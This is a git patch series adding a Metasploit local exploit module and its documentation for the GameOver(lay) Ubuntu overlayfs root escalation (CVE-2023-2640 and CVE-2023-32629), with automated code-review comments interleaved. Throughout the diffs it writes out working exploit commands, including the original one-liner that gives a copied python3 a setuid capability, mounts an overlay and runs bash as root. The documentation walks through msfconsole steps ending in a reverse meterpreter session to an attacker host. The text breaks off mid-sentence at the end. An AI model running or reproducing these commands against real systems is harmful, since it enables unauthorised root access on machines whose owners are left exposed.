From 5edec2525f8b36406b17cbfea7d8348e82cacd26 Mon Sep 17 00:00:00 2001 From: Corey Date: Tue, 6 Aug 2024 15:29:17 -0400 Subject: [PATCH 01/11] Rebase and Squash init Add moduel scaffolding Add Opts, check and exploit methods Rubocop changes Add checks for vunerable kernel versions Write check for distro type Finish protoype of check add exploit Make changes to check method Add checkcode Add x86 for payload compatability remove check, add kernel version add codenam, transform keys in vuln Note minor spelling change Add description Add cve references Start trying to drop payloads on disk Change description, include modules for file upload, use proper methods for writing payload continue trying to upload Use write_file instead of upload_and_chmodx remove upload_dir opt expirement w g1vi exploit Include cmd_stage module, add generate_payload_exe, run payload in new namespace Add missing call to setcap, fix description Fix unterminated string, fix directory for calling python copy Rubocop changes Create dynamic payload Add mkdir_p and WritableDir opts Update modules/exploits/linux/local/game_overlay_privesc.rb Co-authored-by: Julien Voisin Revert back to python exploit, add dynamic writable dir Add todos Remove FileUtils Change module name Add checkcodes Add more checkcodes --- .../linux/local/gameoverlay_privesc.rb | 164 ++++++++++++++++++ 1 file changed, 164 insertions(+) create mode 100644 modules/exploits/linux/local/gameoverlay_privesc.rb diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb new file mode 100644 index 000000000000..4bada28aff10 --- /dev/null +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb 
@@ -0,0 +1,164 @@ +class MetasploitModule < Msf::Exploit::Local + + prepend Msf::Exploit::Remote::AutoCheck + include Msf::Post::Linux::System + include Msf::Post::Linux::Kernel + include Msf::Post::File + include Msf::Exploit::FileDropper + include Msf::Exploit::CmdStager + include FileUtils + + # TODO + # 1) Add Msf::Post::Linux::System::get_sysinfo to get linux and kernel versions + # ^ What does the output change to + # + # 4) Make exploit more readable with multiline string, change exploit to use + # todo add python requirement + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'GameOver(lay) Privilege Escalation and Container Escape', + 'Description' => %q{ + This module exploits the use of unsafe functions in a number of Ubuntu kernels + utilizing vunerable versions of overlayfs. To mitigate CVE-2021-3493 the Linux + kernel added a call to vfs_setxattr during ovl_do_setxattr. Due to independent + changes to the kernel by the Ubuntu development team __vfs_setxattr_noperm is + called during ovl_do_setxattr without calling the intermediate safety function + vfs_setxattr. Ultimatly this module allows for root access to be achieved by + writing setuid capabilities to a file which are not sanitized after being unioned + with the upper mounted directory. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'g1vi', # PoC + 'h00die', # Module Suggestion + 'gardnerapp', # MsF Module + ], + 'Platform' => ['linux'], + 'SessionTypes' => ['shell', 'meterpreter'], + 'DisclosureDate' => '2023-07-26', + 'References' => [ + ['URL', 'https://www.crowdstrike.com/blog/crowdstrike-discovers-new-container-exploit/'], + ['URL', 'https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629'], + ['URL', 'https://www.cvedetails.com/cve/CVE-2023-2640/'], + ['URL', 'https://www.cvedetails.com/cve/CVE-2023-32629/'], + ['URL', 'https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability'], + ['CVE', '2023-32629'], + ['CVE', '2023-2640'] + ], + 'Targets' => [ [ 'Linux', {} ] ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'CmdStagerFlavor' => 'bourne' + ) + ) + register_options [ + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']), + OptString.new('PayloadFileName', [true, 'Name of payloadf', 'marv']) + ] + end + + def vuln + # Keys are ubuntu versions, vals is list of vunerable kernels + { + "Lunar Lobster": %w[6.2.0], # Ubuntu 23.04 + "Kinetic Kudu": %w[5.19.0], # Ubuntu 22.10 + "Jammy Jellyfish": %w[5.19.0 6.2.0], # Ubuntu 22.04 LTS + "Focal Fossa": %w[5.4.0], # Ubuntu 20.04 LTS + "Bionic Beaver": %w[5.4.0] # Ubuntu 18.04 LTS + }.transform_keys!(&:to_s) # w/o this key will be :"Bionic Beaver" + end + + def check + return CheckCode::Safe('Target is not linux.') unless session.platform == 'linux' + + # Must be Ubuntu + return CheckCode::Safe('Target is not Ubuntu.') unless kernel_version =~ /[uU]buntu/ + + os = cmd_exec 'cat /etc/os-release' + + # grab codename i.e. 
Focal Fossa + codename = os.scan(/\(\w* \w*\)/)[0] + + # Remove '(' and ')' + codename.delete_prefix!('(').delete_suffix!(')') + + print_status "Detected Ubuntu version: #{codename}" + + # uname -r + # yields something like 5.4.0-1018-blah + kernel = kernel_release + print_status "Detected kernel version: #{kernel}" + + # Make sure release is running vunerable kernel + # will this return in correct context?? + # could scan kernel to prevent looping if return below doesn't work + vuln[codename].each do |version| + if kernel.include? version + return CheckCode::Vulnerable "#{codename} with #{kernel} kernel is vunerable" + end + end + + return CheckCode::Safe("Target does not appear to be running a vunerable Ubuntu Distro or Kernel") + end + + def execute_command(_cmd, _opts = {}) + pay_file = datastore['PayloadFilename'] + + pay_dir = datastore['WritableDir'] + pay_dir += "/" unless pay_dir.ends_with? "/" + pay_dir += Rex::Text.rand_text_alpha 10 + + directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" } + + # Should we make sure directory doesn't already exist? + + directories.each do |dir| + print_status "Creating directory #{dir}" + mkdir dir + end + + register_dir_for_cleanup pay_dir + + print_status "Creating directory to store payload: #{pay_dir}" + pay_dir.concat "/" unless pay_dir.ends_with? "/" + cmd_exec "mkdir -p #{pay_dir}" + + register_dir_for_cleanup pay_dir + + pay = "#{pay_dir}#{pay_file}" + + print_status "Writing payload: #{pay}" + + write_file "#{pay}", generate_payload_exe + # works move test to low, run unshare mount set cap, shell + + print_status 'Starting new namespace, and running exploit...' 
+ + # g1vi original + # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'" + + # TODO move running of payload and exploit to different cmd_exec calls + # Swap vulns w code names, make sure regexes work agsain,s + hack = <<-TEXT + unshare -rm sh -c \"cp /u*/b*/p*3 #{pay_dir}; + setcap cap_setuid+eip #{pay_dir}l/python3; + mount -t overlay overlay -o rw,lowerdir=#{pay_dir}l,upperdir=#{pay_dir}u,workdir=#{pay_dir}w #{pay_dir}m + && touch /tmp/main/m/* + \" + && #{pay_dir}/u/python3 -c 'import os;os.setuid(0); os.system(\"#{pay}\")' + TEXT + + print_status "Running exploit:\n '#{hack}'\n " + print_status "Output of command: #{cmd_exec_with_result(hack)}" + end + + def exploit + puts "System Info: #{get_sysinfo}" + execute_cmdstager + + # System Info: {:kernel=>"Linux ip-172-26-8-97 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux", :distro=>"ubuntu", :version=>"Ubuntu 20.04.6 LTS"} + end + +end From c927f22d66fa8f896442b98e30c92d8a66f58a75 Mon Sep 17 00:00:00 2001 From: gardnerapp <70026825+gardnerapp@users.noreply.github.com> Date: Fri, 20 Sep 2024 09:06:44 -0400 Subject: [PATCH 02/11] Update modules/exploits/linux/local/game_overlay_privesc.rb Co-authored-by: jheysel-r7 --- modules/exploits/linux/local/gameoverlay_privesc.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index 4bada28aff10..77fdc6217a70 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb 
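Review bot: `check` raises instead of returning a CheckCode when the detected codename is not a key of `vuln` (any Ubuntu release not in the table), because `vuln[codename]` is nil and `.each` is called on it; the same happens when `os.scan(...)[0]` finds no parenthesised codename and `delete_prefix!` runs on nil. Guard both before the loop: `return CheckCode::Safe("Unrecognised Ubuntu release: #{codename.inspect}") unless codename && vuln.key?(codename)`. The kernel test `kernel.include? version` also only compares the base version (`5.4.0`), not the ABI build number that separates patched from unpatched kernels, so a patched `5.4.0-NNN` is reported as Vulnerable; unless the fixed ABI numbers are encoded, `CheckCode::Appears` is the honest result. `puts "System Info: ..."` in `exploit` bypasses the module output channel and should be `print_status`.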
@@ -140,7 +140,6 @@ def execute_command(_cmd, _opts = {}) # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'" # TODO move running of payload and exploit to different cmd_exec calls - # Swap vulns w code names, make sure regexes work agsain,s hack = <<-TEXT unshare -rm sh -c \"cp /u*/b*/p*3 #{pay_dir}; setcap cap_setuid+eip #{pay_dir}l/python3; @@ -151,7 +150,7 @@ def execute_command(_cmd, _opts = {}) TEXT print_status "Running exploit:\n '#{hack}'\n " - print_status "Output of command: #{cmd_exec_with_result(hack)}" + print_status(cmd_exec_with_result(hack)) end def exploit From 51194ad0c974f36d9b00d4ad299d3126d04af82b Mon Sep 17 00:00:00 2001 From: gardnerapp <70026825+gardnerapp@users.noreply.github.com> Date: Fri, 20 Sep 2024 09:11:46 -0400 Subject: [PATCH 03/11] Rebase and maintain authorship Rebase and change payload delivery Rebase and remove cmdstager Update modules/exploits/linux/local/game_overlay_privesc.rb Co-authored-by: jheysel-r7 remove CmdStager Mixin Add PrependSetuid Remove python from exploit Remove generate_payload_exe and add dynamic directory to upper mount layer Change where payload is dropped Remove FileUtils module Call proper method for generating payload Seperate exploit and triggering of payload Seperate exploit and triggering payload test --- .../linux/local/gameoverlay_privesc.rb | 63 +++++++------------ 1 file changed, 22 insertions(+), 41 deletions(-) diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index 77fdc6217a70..c156554ee2b2 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb 
@@ -5,15 +5,7 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Post::Linux::Kernel include Msf::Post::File include Msf::Exploit::FileDropper - include Msf::Exploit::CmdStager - include FileUtils - # TODO - # 1) Add Msf::Post::Linux::System::get_sysinfo to get linux and kernel versions - # ^ What does the output change to - # - # 4) Make exploit more readable with multiline string, change exploit to use - # todo add python requirement def initialize(info = {}) super( @@ -50,12 +42,14 @@ def initialize(info = {}) ], 'Targets' => [ [ 'Linux', {} ] ], 'Arch' => [ ARCH_X86, ARCH_X64 ], - 'CmdStagerFlavor' => 'bourne' + 'DefaultOptions' => { + 'PrependSetuid' => true, + } ) ) register_options [ OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']), - OptString.new('PayloadFileName', [true, 'Name of payloadf', 'marv']) + OptString.new('PayloadFileName', [true, 'Name of payload', 'marv']), ] end 
@@ -103,61 +97,48 @@ def check return CheckCode::Safe("Target does not appear to be running a vunerable Ubuntu Distro or Kernel") end - def execute_command(_cmd, _opts = {}) + def exploit pay_file = datastore['PayloadFilename'] pay_dir = datastore['WritableDir'] pay_dir += "/" unless pay_dir.ends_with? "/" pay_dir += Rex::Text.rand_text_alpha 10 - directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" } + pay_dir += "/" unless pay_dir.ends_with? "/" + print_status "Creating directory to store payload: #{pay_dir}" + mkdir pay_dir - # Should we make sure directory doesn't already exist? + directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" } directories.each do |dir| print_status "Creating directory #{dir}" - mkdir dir + mkdir "#{dir}" end - register_dir_for_cleanup pay_dir - - print_status "Creating directory to store payload: #{pay_dir}" - pay_dir.concat "/" unless pay_dir.ends_with? "/" - cmd_exec "mkdir -p #{pay_dir}" - - register_dir_for_cleanup pay_dir - pay = "#{pay_dir}#{pay_file}" print_status "Writing payload: #{pay}" - write_file "#{pay}", generate_payload_exe - # works move test to low, run unshare mount set cap, shell + write_file pay, generate_payload.generate print_status 'Starting new namespace, and running exploit...' 
# g1vi original # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'" - # TODO move running of payload and exploit to different cmd_exec calls - hack = <<-TEXT - unshare -rm sh -c \"cp /u*/b*/p*3 #{pay_dir}; - setcap cap_setuid+eip #{pay_dir}l/python3; - mount -t overlay overlay -o rw,lowerdir=#{pay_dir}l,upperdir=#{pay_dir}u,workdir=#{pay_dir}w #{pay_dir}m - && touch /tmp/main/m/* - \" - && #{pay_dir}/u/python3 -c 'import os;os.setuid(0); os.system(\"#{pay}\")' - TEXT - - print_status "Running exploit:\n '#{hack}'\n " - print_status(cmd_exec_with_result(hack)) - end + # Exploit overlayfs vuln + hack = "unshare -rm sh -c \" cd #{pay_dir} && cp #{pay} l/; setcap cap_setuid+eip l/#{pay_file}; + mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*\"" + - def exploit - puts "System Info: #{get_sysinfo}" - execute_cmdstager + print_status "Running exploit:\n'#{hack}'\n" + print_status(cmd_exec_with_result(hack).to_s) + + # Trigger payload + trigger = "cp #{pay_dir}u/#{pay_file} /home/ubuntu/test_payload; chmod +x #{pay_dir}u/#{pay_file} && #{pay_dir}u/#{pay_file}" - # System Info: {:kernel=>"Linux ip-172-26-8-97 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux", :distro=>"ubuntu", :version=>"Ubuntu 20.04.6 LTS"} + print_status "Triggering payload: #{trigger}" + print_status(cmd_exec_with_result(trigger).to_s) end end From 883a0f8985362151d1151b5caeaf9b3627d35695 Mon Sep 17 00:00:00 2001 
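Review bot: The trigger line copies the payload to the hard-coded `/home/ubuntu/test_payload`, a test leftover that fails on hosts without that home directory and leaves an unregistered root-owned copy behind; drop `cp #{pay_dir}u/#{pay_file} /home/ubuntu/test_payload;` from the trigger string. This hunk also removes both `register_dir_for_cleanup` calls, so `pay_dir`, the four overlay directories and the written payload are no longer cleaned up by FileDropper; add `register_dir_for_cleanup(pay_dir)` after `mkdir pay_dir` and `register_file_for_cleanup(pay)` after `write_file`. The `exploit` method is fully visible in this hunk.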
From: gardnerapp <70026825+gardnerapp@users.noreply.github.com> Date: Sun, 29 Sep 2024 08:04:32 -0400 Subject: [PATCH 04/11] Update modules/exploits/linux/local/gameoverlay_privesc.rb Co-authored-by: Brendan --- .../linux/local/gameoverlay_privesc.rb | 27 ++++++++++++++++--- 1 file changed, 23 insertions(+), 4 deletions(-) diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index c156554ee2b2..5a5dd6372285 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb @@ -40,10 +40,29 @@ def initialize(info = {}) ['CVE', '2023-32629'], ['CVE', '2023-2640'] ], - 'Targets' => [ [ 'Linux', {} ] ], - 'Arch' => [ ARCH_X86, ARCH_X64 ], - 'DefaultOptions' => { - 'PrependSetuid' => true, + 'Targets' => [ + [ + 'Linux_Binary', + { + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'PrependSetuid' => true + } + ], + [ + 'Linux_Command', + { + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'BadChars' => "\x93\x94" + } + } + ] + ], + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [ARTIFACTS_ON_DISK] } ) ) From e506c34e13a7299f88a1bc0a501c94fc541bbf94 Mon Sep 17 00:00:00 2001 From: gardnerapp <70026825+gardnerapp@users.noreply.github.com> Date: Sun, 29 Sep 2024 08:05:27 -0400 Subject: [PATCH 05/11] Update modules/exploits/linux/local/gameoverlay_privesc.rb Co-authored-by: Brendan --- .../linux/local/gameoverlay_privesc.rb | 19 +++++++++++++++---- 1 file changed, 15 insertions(+), 4 deletions(-) diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index 5a5dd6372285..20d312a21afb 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb 
@@ -118,16 +118,27 @@ def check def exploit pay_file = datastore['PayloadFilename'] - pay_dir = datastore['WritableDir'] pay_dir += "/" unless pay_dir.ends_with? "/" pay_dir += Rex::Text.rand_text_alpha 10 - pay_dir += "/" unless pay_dir.ends_with? "/" print_status "Creating directory to store payload: #{pay_dir}" mkdir pay_dir - - directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" } + pay_dir = datastore['WritableDir'] + pay_dir << '/' unless pay_dir.ends_with? '/' + pay_dir += Rex::Text.rand_text_alpha(rand(6..13)) + pay_dir << '/' + directories = [] + directories << pay_dir + lower_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/' + directories << lower_dir + upper_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/' + directories << upper_dir + work_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/' + directories << work_dir + merge_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/' + directories << merge_dir + bash_copy = '/var/tmp/bash' directories.each do |dir| print_status "Creating directory #{dir}" From c6425f72454269b52348e7128c8489aecab4c123 Mon Sep 17 00:00:00 2001 From: gardnerapp <70026825+gardnerapp@users.noreply.github.com> Date: Sun, 29 Sep 2024 08:06:01 -0400 Subject: [PATCH 06/11] Break out command building to make it easier to read Update modules/exploits/linux/local/gameoverlay_privesc.rb Co-authored-by: Brendan --- .../linux/local/gameoverlay_privesc.rb | 32 +++++++++++-------- 1 file changed, 19 insertions(+), 13 deletions(-) diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index 20d312a21afb..ae4006d8972e 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb @@ -6,7 +6,6 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Post::File include Msf::Exploit::FileDropper - def initialize(info = {}) super( update_info( 
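Review bot: The hunk leaves two competing `pay_dir` setups: the first block still runs `mkdir pay_dir` on a random directory that nothing uses and nothing cleans up, and the second rebinds `pay_dir` to `datastore['WritableDir']` and then does `pay_dir << '/'`, which appends to the datastore's own String object in place, so `WritableDir` grows by a slash on every run of the module. Delete the first block and build the path non-destructively: `pay_dir = datastore['WritableDir']` / `pay_dir += '/' unless pay_dir.ends_with? '/'` / `pay_dir += Rex::Text.rand_text_alpha(rand(6..13)) + '/'`. The `exploit` method continues past the end of the hunk.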
@@ -157,18 +156,25 @@ def exploit # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'" # Exploit overlayfs vuln - hack = "unshare -rm sh -c \" cd #{pay_dir} && cp #{pay} l/; setcap cap_setuid+eip l/#{pay_file}; - mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*\"" - - - print_status "Running exploit:\n'#{hack}'\n" - print_status(cmd_exec_with_result(hack).to_s) - - # Trigger payload - trigger = "cp #{pay_dir}u/#{pay_file} /home/ubuntu/test_payload; chmod +x #{pay_dir}u/#{pay_file} && #{pay_dir}u/#{pay_file}" - - print_status "Triggering payload: #{trigger}" - print_status(cmd_exec_with_result(trigger).to_s) + # Build the command + + exploit_cmd = 'unshare -rm sh -c "' + exploit_cmd << "cp #{cmd_exec('which python3')} #{lower_dir}; " + exploit_cmd << "setcap cap_setuid+eip #{lower_dir}python3; " + exploit_cmd << "mount -t overlay overlay -o rw,lowerdir=#{lower_dir},upperdir=#{upper_dir},workdir=#{work_dir} #{merge_dir} && " + exploit_cmd << "touch #{merge_dir}*; \" && " + exploit_cmd << "#{upper_dir}python3 -c 'import os;os.setuid(0);os.system(" + exploit_cmd << "\"cp /bin/bash #{bash_copy} && chmod +x #{bash_copy} && " + exploit_cmd << "chmod +x #{payload_cmd} && " unless target.arch.first == ARCH_CMD + exploit_cmd << "#{bash_copy} -p -c " + exploit_cmd << payload_cmd + exploit_cmd << ' && ' unless target.arch.first == ARCH_CMD + exploit_cmd << " rm -rf #{lower_dir} #{merge_dir} #{upper_dir} #{work_dir} #{bash_copy}\")'" + + vprint_status(exploit_cmd.to_s) + + output = cmd_exec(exploit_cmd) + print_status(output) end end From 6e09722f67e6e3d66442f2283f1bc0505a8630c8 Mon Sep 17 00:00:00 2001 
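Review bot: The command is built around `cmd_exec('which python3')` with no check that it returned a path, so on a target without python3 (or without `setcap`/`unshare`) the `cp` copies nothing and the module ends with no diagnosis; resolve the path once up front and abort with `fail_with(Failure::NotFound, 'python3 not found on target')` when it is blank, and consider testing `setcap` and `unshare` the same way in `check`. The technique also depends on unprivileged user namespaces being allowed, which is a separate condition from the kernel version the check inspects; worth a documented caveat or a `fail_with` when `unshare -rm true` fails. This commit references `payload_cmd`, which is only defined in the next commit, so the module does not run at this point in the series. The enclosing `exploit` method starts before the hunk.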
From: gardnerapp <70026825+gardnerapp@users.noreply.github.com> Date: Sun, 29 Sep 2024 08:06:17 -0400 Subject: [PATCH 07/11] Rubocop changes and arch tracking for payload Update modules/exploits/linux/local/gameoverlay_privesc.rb Co-authored-by: Brendan Rubocop changes --- .../linux/local/gameoverlay_privesc.rb | 28 ++++++++++--------- 1 file changed, 15 insertions(+), 13 deletions(-) diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index ae4006d8972e..a5f219453485 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb @@ -112,15 +112,15 @@ def check end end - return CheckCode::Safe("Target does not appear to be running a vunerable Ubuntu Distro or Kernel") + return CheckCode::Safe('Target does not appear to be running a vunerable Ubuntu Distro or Kernel') end def exploit - pay_file = datastore['PayloadFilename'] + datastore['PayloadFilename'] pay_dir = datastore['WritableDir'] - pay_dir += "/" unless pay_dir.ends_with? "/" + pay_dir += '/' unless pay_dir.ends_with? '/' pay_dir += Rex::Text.rand_text_alpha 10 - pay_dir += "/" unless pay_dir.ends_with? "/" + pay_dir += '/' unless pay_dir.ends_with? '/' print_status "Creating directory to store payload: #{pay_dir}" mkdir pay_dir pay_dir = datastore['WritableDir'] 
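Review bot: The replacement line `datastore['PayloadFilename']` in `exploit` is a bare expression whose value is discarded, so it does nothing and RuboCop's Lint/Void will flag it; if the `pay_file` assignment is no longer needed here, delete the line rather than leaving the lookup in place. The `exploit` method continues outside the hunk.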
@@ -141,20 +141,22 @@ def exploit directories.each do |dir| print_status "Creating directory #{dir}" - mkdir "#{dir}" + mkdir dir.to_s end - pay = "#{pay_dir}#{pay_file}" - - print_status "Writing payload: #{pay}" - - write_file pay, generate_payload.generate - - print_status 'Starting new namespace, and running exploit...' + if target.arch.first == ARCH_CMD + payload_cmd = "\\\"#{payload.encoded}\\\"" + else + pay_file = datastore['PayloadFilename'] + payload_path = "#{pay_dir}#{pay_file}" + print_status "Writing payload: #{payload_path}" + write_file(payload_path, generate_payload_exe) + payload_cmd = payload_path + end # g1vi original # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'" - + # Exploit overlayfs vuln # Build the command From 19770cf8702a674357cfe494db32f5fd3a4ae494 Mon Sep 17 00:00:00 2001 From: gardnerapp <70026825+gardnerapp@users.noreply.github.com> Date: Thu, 3 Oct 2024 19:43:15 -0400 Subject: [PATCH 08/11] Remove unneeded file and rudocop corrections Update modules/exploits/linux/local/gameoverlay_privesc.rb Co-authored-by: Brendan Give bwatters7 credit, add docs Experiment with randomized bash copy and Rex::File.join remove unused line Add missing parenthesis fix problem with bash copy Remove rex::join, call proper method for generating payload add exploit::exe mixin, bash copy randomization Rubocop changes Remove nc --- .../linux/local/gameoverlay_privesc.md | 148 ++++++++++++++++++ .../linux/local/gameoverlay_privesc.rb | 23 +-- 2 files changed, 162 insertions(+), 9 deletions(-) create mode 100644 documentation/modules/exploit/linux/local/gameoverlay_privesc.md 
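Review bot: `write_file(payload_path, generate_payload_exe)` drops an executable on disk but nothing in the hunk registers it with `register_file_for_cleanup`, and the `rm -rf` at the tail of the exploit command only removes the four overlay directories and the bash copy, so the payload and `pay_dir` survive unless they are registered somewhere outside this hunk; add `register_file_for_cleanup(payload_path)` right after the write. For the ARCH_CMD target, `payload_cmd = "\\\"#{payload.encoded}\\\""` wraps the command in escaped double quotes while the declared BadChars at this point are `\x93\x94`, so any `"` or `'` in a command payload still breaks the outer `sh -c` quoting. `mkdir dir.to_s` is a no-op conversion on a String. The `exploit` method continues outside the hunk.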
diff --git a/documentation/modules/exploit/linux/local/gameoverlay_privesc.md b/documentation/modules/exploit/linux/local/gameoverlay_privesc.md new file mode 100644 index 000000000000..38f00adb4a51 --- /dev/null +++ b/documentation/modules/exploit/linux/local/gameoverlay_privesc.md 
@@ -0,0 +1,148 @@ +## Description + +CVE-2023-2640 and CVE-2023-32629 are vunerabilites that allow for the arbitrary setting of +capabilities while overlaying filesystems. On most Linux Kernels during the execution of + `ovl_do_setxattr` an intermediate function `vfs_setxatrr` converts file capabilities in a +way that limits them to the current namesapce. However, on some versions of the Ubuntu kernel + `_vfs_setxattr_noperm` is called directly without calling `vfs_setxattr`. + +When a new namespace is created the user will technically be "root" within that given +namespace. This module will take advantage of this by setting the `CAP_SETUID` capability +on a system binary. It will then perform filesystem overlay, copying the binary into the lower +directory. Because of the flaws described above when the binary is transfered into the upper +directory it's capabilities will not be sanitized and persist in the "normal" namespace. + +## Vunerable Application + +These vunerabilities are somewhat unique in that they effect a wide variety of Ubuntu releases +and kernel versions, as described in the list below. + +Ubuntu 23.04 (Lunar Lobster)m kernel 6.2.0, (CVE-2023-2640 & CVE-2023-32629) + +Ubuntu 22.10 (Kinetic Kudu), kernel -> 5.19.0, (CVE-2023-2640 & CVE-2023-32629) + +Ubuntu 22.04 LTS (Jammy Jellyfish), kernel -> 5.19.0, (CVE-2023-2640 & CVE-2023-32629) + +Ubuntu 22.04 LTS (Jammy Jellyfish), kernel -> 6.2.0, (CVE-2023-2640 & CVE-2023-32629) + +Ubuntu 20.04 LTS (Focal Fossa), kernel -> 5.4.0, (CVE-2023-32629) + +Ubuntu 18.04 LTS (Bionic Beaver), kernel -> 5.4.0, (CVE-2023-32629) + +The user can download a vunerable version, for example: + +``` +sudo apt update +sudo apt install -y linux-image-5.19.0-41-generic linux-headers-5.19.0-41-generic +reboot +``` +While testing @bwatters7 mentioned taking the system Be sure to take the system offline to +prevent the vunerabilities from silently being patched. 
+ +This module has succesfully been tested on the following: + +Ubuntu 22.04 LTS (Jammy Jellyfish) 5.19.0-41-generic + +Ubuntu 20.04 LTS (Focal Fossa) 5.4.0-1018-aws + +## Verification Steps + +1). Start `msfconsole` + +2). Get a session on a vunerable system + +3). Use `exploit/linux/local/gameoverlay_privesc` + +4). Optional: choose target for payload, either system command (1) or payload (2) +`set target 1` + +5). Set session `set session [SESSION]` + +5). Do. `run` + +6). You should get a new session running as root. + +## Options + +### Payload File Name +Name of the file storing the payload, default is `marv`. + +### Writable Dir +The name of a directory with write permissions, defualt is `/tmp`. This will be where the +payload file will be created. Additionally during the exploit a series of directories will be +created here to perform the filesystem overlaying. + +## Scenarios + +You have a non-root session on one of the systems described above. Please note that this +module will automatically run checks to determine if the system is vunerable, you can disable +this with `set AutoCheck False`. 
+ +``` + > use exploit/linux/local/gameoverlay_privesc +[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp +msf6 exploit(linux/local/gameoverlay_privesc) > set session 1 +session => 1 +msf6 exploit(linux/local/gameoverlay_privesc) > set target 0 +target => 0 +msf6 exploit(linux/local/gameoverlay_privesc) > set payload linux/aarch64/meterpreter_reverse_tcp +payload => linux/aarch64/meterpreter_reverse_tcp +msf6 exploit(linux/local/gameoverlay_privesc) > set lhost 10.5.135.201 +lhost => 10.5.135.201 +msf6 exploit(linux/local/gameoverlay_privesc) > show options + +Module options (exploit/linux/local/gameoverlay_privesc): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + PayloadFileName pVmtuGOGXdO yes Name of payload + SESSION 1 yes The session to run this module on + WritableDir /tmp yes A directory where we can write files + + +Payload options (linux/aarch64/meterpreter_reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 10.5.135.201 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Linux_Binary + + + +View the full module info with the info, or 